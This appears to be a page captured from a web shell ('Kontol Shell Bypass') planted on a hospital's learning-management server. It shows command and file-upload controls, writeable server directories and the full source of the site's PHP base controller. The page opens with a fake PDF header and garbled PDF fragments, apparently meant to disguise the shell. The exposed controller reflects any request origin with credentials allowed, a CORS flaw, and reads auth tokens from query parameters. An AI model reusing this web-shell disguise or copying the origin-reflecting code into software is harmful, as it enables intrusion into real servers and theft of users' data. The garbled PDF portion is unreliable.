%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :
ikan Uploader :
Directory :  /var/www/html/shardahospital.org/shardalms/student-panel/api/application/core/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/shardalms/student-panel/api/application/core/MY_Controller.php
<?php
class MY_Controller extends CI_Controller {
    function __construct() {
		parent::__construct();
		//header('Access-Control-Allow-Origin: *');

		$origin=$this->input->server('HTTP_ORIGIN');
		header('Access-Control-Allow-Origin: '.$origin);
		header('Access-Control-Allow-Credentials: true');
		header('Access-Control-Allow-Headers: Content-Type, Origin, Accept, AuthToken');
		
		
		if ($this->input->method() == 'options') {
            header('HTTP/1.1 200 OK');
			header('Access-Control-Allow-Headers: Content-Type, Origin, Accept, AuthToken');
			header('Access-Control-Allow-Methods: POST, GET, OPTIONS');
			header('Access-Control-Max-Age: 86400');
			die;
		}
		
		date_default_timezone_set('Asia/Kolkata');
		define('IS_AJAX', $this->input->is_ajax_request()?TRUE:FALSE);
		define('IS_POST', $this->input->method()=='post'?TRUE:FALSE);
		$this->db->query("SET sql_mode=''");
		$this->load->model('common_model', 'common');
		
		$dtl=$this->loggedData();
		define('USER_ID', 		$dtl['id']?$dtl['id']:'');

		if(IS_POST){
			$this->req=array('required'=>'%s required', 'is_unique'=>'This %s is already used', 'numeric'=>'%s must be numeric', 'integer'=>'%s must be numeric');
			$this->load->library('form_validation');
		}
	}
	
	function loggedData(){
		//$a=$this->input->get_request_header('AuthToken', TRUE);
		$a=$this->input->get_post('AuthToken');
		$token=$a?$a:'';
		if(!$token){
			return [];
		}
		$dtl=$this->db->select("id, mob, name, email, status")->where('auth_token', $token)->get("applicants")->row_array();
		return $dtl?$dtl:[];
	}
	
	function json_data($res, $jsonNumChk=false){
		header('Content-Type: application/json');
		$res=$res?$res:array();
		if($this->config->item('csrf_protection')===TRUE){
			$res['csrf_token']=$this->security->get_csrf_token_name();
			$res['csrf_hash']=$this->security->get_csrf_hash();
		}
		if($jsonNumChk){
			die(json_encode($res, JSON_NUMERIC_CHECK));
		}
		die(json_encode($res));
	}
	
	function img_ext_check($v, $param='image'){
		if($_FILES[$param]['name'] and !check_image_ext($_FILES[$param]['name'])){
			$this->form_validation->set_message('img_ext_check', 'Please upload .jpg, .jpeg, .gif or .png file only');
			return FALSE;
		}else{
			return TRUE;
		}
	}

	function valid_date($v){
		if($v && !is_valid_date($v)){
			$this->form_validation->set_message("valid_date", "Invalid date format!");
			return FALSE;
		}
		return TRUE;
	}

	function is_access($module){
		if(USER_TYPE=='ADMIN'){
			return TRUE;
		}
		$this->load->model('auth_model', 'auth');
		$modules=$this->auth->modules(USER_ID);
		if(isset($modules[$module])){
			return TRUE;
		}
		return FALSE;
	}

	function checkAccess($module){
		if(!$this->is_access($module)){
			$this->json_data(array('success'=>'F', 'msg'=>'You are not allowed to access this page'));
		}
	}
}

//EOF

Kontol Shell Bypass